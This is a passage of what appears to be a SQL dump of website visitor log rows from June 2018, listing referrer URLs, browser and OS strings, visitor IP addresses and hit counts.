yodVzBEtOSyx1iCLDKTOUA9sBk8avxkenX8XnNBQZXq_Y0KPgaHkyD%26ref%3DorjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO8X2kAZdPr7ZFNMDZ049yFsxmu4Za9CXa4R-1M_gC9BHu4v_aT6NdaD6Z6vQ7y7AEw%26l10n%3Dru%26cts%3D1529663201307%26mc%3D4.27895273247&lr=213','MSIE','Windows','10.0','','31.135.83.66','000',1,0),(32088,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.J1xveD8regeiL7Ix0VnRtz-PfI0R7gi-O_wi2qS08Cc.173d4340223a305678abaef39383314354b0f900&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041bHVDUDlpNXlhV0ZWTlZPdU1wZnBCNzF3Y2ZUMWZVekdFVThaOVVuN3JQZyws&sign=6c82af385141b68aed1584c164094af8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','164.132.211.149','000',2,0),(32089,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.D-u3T_7qLgq5IPHFB-W2WiQwJBRgK8JuG_yLcmw5tx8.4729d884cb432454ac5b28eae90129b3fe9f2110&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040amcwOGxYWXEyWUFndDQybmVhUV9GMjRNUDdsU181RjhlYmpra0I4d2pYZyws&sign=32a0d99cc4d2e15a0d1182528e89e658&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.35.127','000',2,0),(32090,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.PN8xbLyH5-xRsLWZlVegUB926igAPUk0oMPAA3tPpz8.de771d706bffcd14cbe0bea50ab6a539ff455397&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043V3ZSX0x4UGQ5Q2taNW9CcUtSMExRRnRxdzZoSVUxcGUxQ0JXdDV5RkRyZyws&sign=e30c26fbca94b2c6cbd47b25a6a78440&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.41.181','000',2,0),(32091,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.HUuxGzi6_uNM3u_ipTlcRVufDhqpBhysMxyJkT1NQ0I.aa97119d6ca23a3e0944b396f61a247ed8acf422&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZTVOSnB6aU91a0NobGk2ZlNWOF9DX0gySUJlLUZPOGJ5S2lpcHFQQ2dDUSws&sign=0b60c6a094bae084cf423b0b29d25617&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.132','000',2,0),(32092,'2018-06-22','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1826.FF56v-gayjHrpQuA7aEnGuzNBaEX-_a2rPlkMddWkMk.7b2790a90540412d0ac42d4a35ae0c62a95c0bee&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043QmVyUXd0Zm91S0hMMHM4ZXk1ZHd3Z3dpSWxGMlAtQWpIVnpHREU3N2xoUSws&sign=55b85bf47ffd778740be9a12abef9cc5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.206.126','000',2,0),(32093,'2018-06-22','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32094,'2018-06-22','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(32095,'2018-06-22','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(32096,'2018-06-22','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(32097,'2018-06-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(32098,'2018-06-22','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(32099,'2018-06-22','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(32100,'2018-06-22','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(32101,'2018-06-22','https://zphiblgz.org','Firefox','Windows','57.0','','154.16.53.179','000',2,0),(32102,'2018-06-22','https://zphiblgz.org','Firefox','Windows','40.1','','49.205.139.215','000',2,0),(32103,'2018-06-22','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(32104,'2018-06-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',2,0),(32105,'2018-06-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(32106,'2018-06-22','https://www.google.com/','Chrome','Windows','67.0.3396.87','','38.88.169.178','000',2,0),(32107,'2018-06-22','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.220.101.0','000',1,0),(32108,'2018-06-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(32109,'2018-06-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.88','000',2,0),(32110,'2018-06-22','https://pills24h.com/','MSIE','Windows','6.0','','46.118.117.97','000',3,0),(32111,'2018-06-22','https://sinhronperevod.ru/article/vidy-sinhronnogo-perevoda.html','MSIE','Windows','6.0','','46.185.119.21','000',2,0),(32112,'2018-06-22','https://zphiblgz.org','Firefox','Windows','40.1','','85.154.180.117','000',2,0),(32113,'2018-06-22','https://www.google.com/','Safari','iPad','11.0','','76.100.44.13','000',15,0),(32114,'2018-06-22','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','80.93.187.145','000',2,0),(32115,'2018-06-22','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','178.62.199.231','000',5,0),(32116,'2018-06-22','https://zphiblgz.org','Chrome','Windows','16.0.912.75','','217.107.219.119','000',1,0),(32117,'2018-06-22','https://zphiblgz.org','Chrome','Windows','16.0.912.77','','217.107.219.119','000',1,0),(32118,'2018-06-22','https://zphiblgz.org','MSIE','Windows','8.0','','217.107.219.119','000',1,0),(32119,'2018-06-22','https://zphiblgz.org','MSIE','Windows','7.0','','217.107.219.119','000',1,0),(32120,'2018-06-22','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(32121,'2018-06-22','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(32122,'2018-06-22','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',1,0),(32123,'2018-06-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32124,'2018-06-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.143.223.162','000',2,0),(32125,'2018-06-23','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','83.136.253.203','000',2,0),(32126,'2018-06-23','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(32127,'2018-06-23','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.30','000',1,0),(32128,'2018-06-23','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(32129,'2018-06-23','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(32130,'2018-06-23','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(32131,'2018-06-23','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','18.221.41.41','000',1,0),(32132,'2018-06-23','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(32133,'2018-06-23','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(32134,'2018-06-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(32135,'2018-06-23','https://zphiblgz.org','MSIE','Windows','9.0','','23.101.169.3','000',2,0),(32136,'2018-06-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1827.hpfaE3me-oAnN54FGENYN9LZW8CnZvbchaFvdBaNke0.eb9a31137ed77da8d19243702ead3786b97a8f49&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043azdEOFVQQ3FSSkpNekFleUdsRmxiMUNIeVZZbjRNUDA3NU5TNUY2YXBzZyws&sign=fec37c9c22105f0c77c2282230c17561&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(32137,'2018-06-23','https://zphiblgz.org','MSIE','Windows','8.0','','185.220.102.8','000',2,0),(32138,'2018-06-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1827.rLGDKFgArpkAbXrFHF9a8q8_XnqFNLeEdFYQkJztLRM.a83d1e4c2cec574d5a7a19d302e822df258ab125&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042bkVsaDNaM3pDeHBVZWFKWVZmckpHSWhOU3l4U0ZIUVVNdFozTDNGMnZSdyws&sign=d9c8fe4cc091c0c91cf8999e488c91b9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.191.223','000',2,0),(32139,'2018-06-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1827.QbStH64pHNjyfn1AzKT1K1uOydSgHnDeZldyJqrJcGU.318554b8a9871b8c4e208c15b77ee354fbf8a74a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042bHkyTkdGMmZtWXVQeHBWRjM0Qmhfa21KNmhHSDI5SUhQVmZZNndZSW5Udyws&sign=b04de537872c7ce2ddc1c049a1cc52e0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.45.158','000',2,0),(32140,'2018-06-23','https://brillianty.info/','MSIE','Windows','6.0','','46.118.117.97','000',2,0),(32141,'2018-06-23','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1827.GnMBdgc4mS7tNuK_8Og7ssUwsCX5hXw-nvoNamltzKM.04d62398f36e724b4f36c70111efd21c7696ffbf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040bldLY1lVRlNoUEZQTk52MF9rSW84OXBaQUJJV3RIa2lpN2VzRUhoZWpndyws&sign=4ef773361f1353e5ecee896ac0367fa7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.197.207','000',2,0),(32142,'2018-06-23','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(32143,'2018-06-23','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.28','000',1,0),(32144,'2018-06-23','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','51.15.63.43','000',1,0),(32145,'2018-06-23','https://zphiblgz.org','Firefox','Windows','40.1','','139.195.10.4','000',2,0),(32146,'2018-06-23','https://yhirurga.ru/','MSIE','Windows','6.0','','46.118.113.218','000',3,0),(32147,'2018-06-23','http://zphiblgz.org/','Safari','Windows','5.2.7','','172.98.87.71','000',2,0),(32148,'2018-06-23','https://officedocuments.net/','MSIE','Windows','6.0','','46.119.126.184','000',2,0),(32149,'2018-06-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(32150,'2018-06-23','http://www.google.com/','Chrome','Android','67.0.3396.87','','99.203.16.154','000',1,0),(32151,'2018-06-23','https://zphiblgz.org','Firefox','Windows','3.6.28','','54.38.183.107','000',1,0),(32152,'2018-06-23','https://www.google.com/','Safari','iPhone','11.0','','71.171.125.250','000',2,0),(32153,'2018-06-23','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(32154,'2018-06-23','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(32155,'2018-06-23','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.27','000',1,0),(32156,'2018-06-23','https://mybuh.kz/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32157,'2018-06-23','http://zphiblgz.org/administrator/index.php','Opera Next','Windows','49.0.2711.0','','185.183.107.88','000',2,0),(32158,'2018-06-23','https://zphiblgz.org','python-requests','Unknown','2.18.4','','167.114.191.237','000',9,0),(32159,'2018-06-23','https://zphiblgz.org','Firefox','Windows','36.0','','167.114.191.237','000',2,0),(32160,'2018-06-23','http://zphiblgz.org','Chrome','Windows','63.0.3239.108','','196.16.232.86','000',2,0),(32161,'2018-06-23','http://zphiblgz.org','Opera','Windows','12.17','','196.16.232.86','000',3,0),(32162,'2018-06-23','https://zphiblgz.org','Firefox','Windows','40.1','','123.193.249.94','000',2,0),(32163,'2018-06-23','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=2ahUKEwioo7_jp-vbAhUqrVkKHX6WDBoQjRx6BAgBEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw1MqWWgF3Y5y3nbMsAX6s5r&ust=1529895700485816','MSIE','Windows','11.0','','98.26.195.211','000',2,0),(32164,'2018-06-23','https://zphiblgz.org/','MSIE','Windows','6.0','','179.43.141.201','000',1,0),(32165,'2018-06-24','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32166,'2018-06-24','https://www.atyks.ru/','MSIE','Windows','5.5','','46.118.113.218','000',2,0),(32167,'2018-06-24','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','40.77.179.99','000',1,0),(32168,'2018-06-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.236.113','000',2,0),(32169,'2018-06-24','https://zphiblgz.org','Firefox','Windows','40.1','','109.10.156.17','000',2,0),(32170,'2018-06-24','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(32171,'2018-06-24','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(32172,'2018-06-24','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.220.101.25','000',1,0),(32173,'2018-06-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.201','000',2,0),(32174,'2018-06-24','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(32175,'2018-06-24','https://zphiblgz.org','Firefox','Macintosh','59.0','','64.246.165.160','000',2,0),(32176,'2018-06-24','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.27','000',1,0),(32177,'2018-06-24','http://pk-pomosch.ru/','MSIE','Windows','5.5','','46.119.126.184','000',2,0),(32178,'2018-06-24','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(32179,'2018-06-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.RtjHFmvQc09uJ181SYkNi3BWbGXCn77U2rYLO8MgOgk.7789019626ebc7be34ec01470b2290899e202f86&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UW5ZeEhDV1dNSU9xUVBlOGRXa2FWVHdLYTAxbHdLTHhtTU9ncUduWEo3QSws&sign=935ef8f6cfe956524e36a149f44f6680&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.216','000',2,0),(32180,'2018-06-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.LqRDJ2MpHCV0LQPoG4RdG0QhB_GpqowfAZHpjDQKOk8.f0cea21b6590e8321412aa76dc210fe9b2684248&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042MXE3MTR0LUswMlk0N0QzMTQwQ1M5UWhyMlg1TFVod0hlV3g3d1Ita2tWUSws&sign=9c6771414271b5eb86180b8e6ea96525&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(32181,'2018-06-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.dcpOa3eANqXx4Nl6vZofqD2N-GpLPHfInCvJEZ72p5c.cac91c8ddbe7c9a73e0d53ec5afba163ffaed875&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041MlZCb2h5aEk4LTFaM3JPYzJ2cHFZTk9LM0xGbkxGcUVPejBESWJ2UmQ0USws&sign=0621d8277a02fb6a054f6621681ff39a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.39','000',2,0),(32182,'2018-06-24','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.i48pWUL-7Blz0sdPZF29IEe8MyOOcdpC3B64kIBSqDY.e1448751787b3b499542136a592d1903a7276cad&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VFRFdHZxYmZ6U2tPV1I4TWhpR21LSHc4dU1CMFRscGdQaWVPX25EcXlDdyws&sign=bd48c5b46a3736aa0cdbc75cb655d75b&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','138.68.181.22','000',2,0),(32183,'2018-06-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.RD_4nFtqBwPCLnzXcKl4Cf4oiYy_gxx0jgpCr95rvr0.fabf4e630939d0d47ebebe68c6e05c0dfa2b95bc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dDFBMnlyQlJGRmZObG83VTd1d2NxbUVGWGYxYWNmOTlCQzJhWUFLNVVJUSws&sign=ade8ff2d24c539235e0d29fd1e353a38&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(32184,'2018-06-24','https://zphiblgz.org','Firefox','Windows','40.1','','202.80.216.188','000',2,0),(32185,'2018-06-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1828.x9givrmIonaSgctUdYTaXv5TotIXqGC0hMAb8sNJmus.5142ddd28973616b53b1406c7341a705ef6144b9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040RlF1RFplNGdkN0N1RFVSWmtVX2dKUkpodlJkSFFNbzlRdzZxUlc0RUpDQSws&sign=14b4e1cd690bab56dc9f2ce7392c02ee&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.217.72.127','000',2,0),(32186,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.86','000',2,0),(32187,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.2','000',2,0),(32188,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.29','000',2,0),(32189,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.127','000',1,0),(32190,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.250','000',2,0),(32191,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.9','000',2,0),(32192,'2018-06-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.52','000',2,0),(32193,'2018-06-24','https://zphiblgz.org','GigablastOpenSource','Unknown','1.0','','78.47.37.98','000',3,0),(32194,'2018-06-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32195,'2018-06-24','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.189.57','000',1,0),(32196,'2018-06-24','https://zphiblgz.org','Firefox','Windows','40.1','','113.199.185.13','000',2,0),(32197,'2018-06-24','https://www.google.com/','Chrome','Windows','67.0.3396.87','','134.192.176.2','000',2,0),(32198,'2018-06-24','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(32199,'2018-06-24','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(32200,'2018-06-24','http://elvel.com.ua/','Opera','Windows','9.0','','46.118.117.97','000',3,0),(32201,'2018-06-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(32202,'2018-06-24','https://zphiblgz.org','Firefox','Windows','40.1','','85.118.79.254','000',2,0),(32203,'2018-06-24','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.106','000',3,0),(32204,'2018-06-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.172.223','000',8,0),(32205,'2018-06-24','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.172.223','000',1,0),(32206,'2018-06-24','http://kinosed.net/','MSIE','Windows','2.0d','','46.119.126.184','000',2,0),(32207,'2018-06-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.173','000',2,0),(32208,'2018-06-24','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','206.180.165.147','000',2,0),(32209,'2018-06-24','https://zphiblgz.org','Firefox','Windows','57.0','','191.102.151.27','000',2,0),(32210,'2018-06-24','http://zphiblgz.org/','Firefox','Windows','26.0','','193.169.252.46','000',3,0),(32211,'2018-06-24','http://skinali.photo-clip.ru/','MSIE','Windows','6.0','','46.185.119.21','000',1,0),(32212,'2018-06-24','http://elvel.com.ua/','Unknown','Unknown','Unknown','','46.118.117.97','000',3,0),(32213,'2018-06-24','https://eduserver.net/','MSIE','Windows','2.0','','46.119.126.184','000',1,0),(32214,'2018-06-24','https://spb-plitka.ru/','MSIE','Windows','2.0','','46.118.113.218','000',2,0),(32215,'2018-06-25','zphiblgz.org','Chrome','Windows','5.0.375.99','','45.40.166.151','000',2,0),(32216,'2018-06-25','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.17.193','000',2,0),(32217,'2018-06-25','https://zphiblgz.org','Firefox','Windows','40.1','','83.28.251.179','000',2,0),(32218,'2018-06-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.28','000',1,0),(32219,'2018-06-25','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32220,'2018-06-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1829.Le0pZcEovHiuZOqBrNzVf0osmagwhg2RH_3pjVxTrrk.771129fc6131ca7f720ad1e97272f77df2de588a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SWpIVzU4bGxEMHA3d2NmeGswM3hCdktSX1VIYTN1YUgybnk4RlVldTBzdyws&sign=0880e2767d20dc317cdaad894e9f121c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.31.105','000',2,0),(32221,'2018-06-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1829.JE5ymu5gDPwv6-moA6MplOXBwsr8Xv91ZQfBblX18bc.6a477d5cd969ca0e97a5c67b24441b29ebb7298f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NmdmV0xZUzV4V2x1R2J3V1E4NXlvZUkwakYyWjZ4Ti1xS2xpZkhUZmVuZyws&sign=dd698ab12aa9aa399eb259c98cd0fd39&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.20.194','000',2,0),(32222,'2018-06-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1829.8fs_pSYTXswNZjqrjB3TWud8qiQrWVRE-f1435YLuRI.b1f799875ee07d3ac163abf5c4f9c1659f07a42d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043a0NxaFNWNV94cl9XT040a0ZTWUdHeWNlSUg1bkxmZW5nU2FueGdwRFU3QSws&sign=767f811020bbfdf719955767446bb51a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.215.107.234','000',2,0),(32223,'2018-06-25','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.108.227','000',1,0),(32224,'2018-06-25','https://zphiblgz.org','Chrome','Windows','58.0.3029.96','','39.104.89.71','000',5,0),(32225,'2018-06-25','https://zphiblgz.org','Firefox','Windows','3.0','','185.45.193.195','000',1,0),(32226,'2018-06-25','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.7.184','000',1,0),(32227,'2018-06-25','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.7.186','000',1,0),(32228,'2018-06-25','https://zphiblgz.org','Firefox','Macintosh','46.0','','198.245.76.202','000',1,0),(32229,'2018-06-25','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.165.168.229','000',1,0),(32230,'2018-06-25','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','204.85.191.30','000',1,0),(32231,'2018-06-25','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(32232,'2018-06-25','zphiblgz.org','Chrome','Windows','58.0.1145.75','','50.63.160.72','000',1,0),(32233,'2018-06-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(32234,'2018-06-25','https://zp